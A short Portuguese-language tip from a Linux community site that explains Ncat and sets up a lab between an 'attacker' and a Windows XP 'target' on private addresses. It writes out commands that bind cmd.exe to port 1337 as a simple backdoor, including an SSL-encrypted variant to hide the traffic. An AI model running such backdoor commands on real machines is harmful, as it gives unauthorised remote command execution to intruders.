Ncat com SSL

Publicado por Roberto Soares (3spreto) em 07/11/2011

[ Hits: 6.517 ]

Blog: http://codesec.blogspot.com

 


Ncat com SSL



Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria de suas funcionalidades se assemelham comparando-as entre si.

O Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do Ncat é a transferência de dados entre dois Hosts (Linux <--> Linux, Windows <--> Windows ou Linux <--> Windows) de forma simplificada.

Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet.

Imagine isso para um backdoor simples heim?

Onde:
  • 192.168.0.125 é o IP do atacante. (BackTrack)
  • 192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando:

ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v 192.168.0.147 1337
Linux: Ncat com SSL

Com SSL

No alvo digite o comando:

ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v --ssl 192.168.0.147 1337
Linux: Ncat com SSL
Agora utilize o wireshark com apenas o filtro "tcp". Em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help
Linux: Ncat com SSL

Transferência de arquivos

Ok, ok, antes de perguntarem sobre como efetuar a transferência de um arquivo entre 2 Hosts Linux, aqui vai os comandos.

Máquina que receberá o arquivo.
Linux: Ncat com SSL
Máquina que enviará o arquivo.
Linux: Ncat com SSL
Veja o novo conteúdo do arquivo.
Linux: Ncat com SSL

Links

Previamente publicada em: Até a próxima!
:wq!

Outras dicas deste autor

OWASP Zed Attack Proxy Project

DuckDNS - Simples solução para DNS dinâmico

Descobrindo informações variadas do alvo pelo BackTrack 4

theHarvester - Vamos colher alguns e-mails?

Tubarão nas nuvens? Vá de Cloudshark!

Leitura recomendada

Backup com Arkeia Free

Para quem está na Deep Web

zuluCrypt no Debian 8 Jessie - Criptografia

Bloqueando MSN, Yahoo, ICQ com Iptables

THC-Hydra no GNU/Linux

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts